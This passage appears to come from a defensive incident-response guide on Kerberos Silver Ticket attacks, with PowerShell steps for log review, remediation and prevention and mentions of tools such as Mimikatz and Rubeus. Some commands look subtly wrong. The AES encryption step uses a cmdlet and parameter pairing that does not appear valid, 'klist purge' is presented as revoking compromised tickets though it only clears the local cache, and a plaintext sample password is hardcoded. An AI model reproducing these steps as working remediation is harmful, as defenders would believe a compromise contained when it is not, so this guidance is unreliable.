Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769} | Select-Object IpAddress

---

🔧 4. Remediation Steps

📌 1. Reset Service Account Passwords

• Immediately reset the password of the affected service account:

Set-ADAccountPassword -Identity ServiceAccountName -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "StrongP@ssw0rd!" -Force)

📌 2. Revoke Compromised Tickets

• Invalidate existing Kerberos tickets:

klist purge

📌 3. Monitor Service Accounts

• Enable auditing on high-value service accounts.

📌 4. Rotate Service Account Passwords Periodically

• Use Managed Service Accounts (gMSA) for automated password management.

📌 5. Terminate Malicious Processes

• Stop any malicious tools still running:

Stop-Process -Name "mimikatz" -Force

📌 6. Perform Full Antivirus Scan

Start-MpScan -ScanType FullScan

---

🛡️ 5. Prevention Steps

1. Enable AES Encryption for Kerberos:

Set-ADAccountControl -Identity ServiceAccountName -KerberosEncryptionType AES256

1. Limit Service Account Privileges:

   • Use least privilege principle for service accounts.

2. Enable Logging and Auditing:

   • Ensure Event IDs 4769, 4624, 4771, and 4662 are actively monitored.

3. Monitor Service Account Usage:

   • Look for unusual login patterns or ticket requests.

4. Restrict Admin Access:

   • Limit access to tools like Mimikatz, Rubeus, and Impacket.

5. Educate Security Teams:

   • Train teams to identify Kerberos anomalies in event logs.

---

🧠 6. Key Takeaways

• Service Account Security: Rotate and secure service account passwords regularly.

• Monitor RC4-HMAC Encryption: It’s a common indicator of Silver Ticket attacks.

• Focus on TGS Tickets: Monitor ticket requests for abnormal lifetimes or pre-authentication failures.

• Regular Audits: Review high-privilege service accounts regularly.

---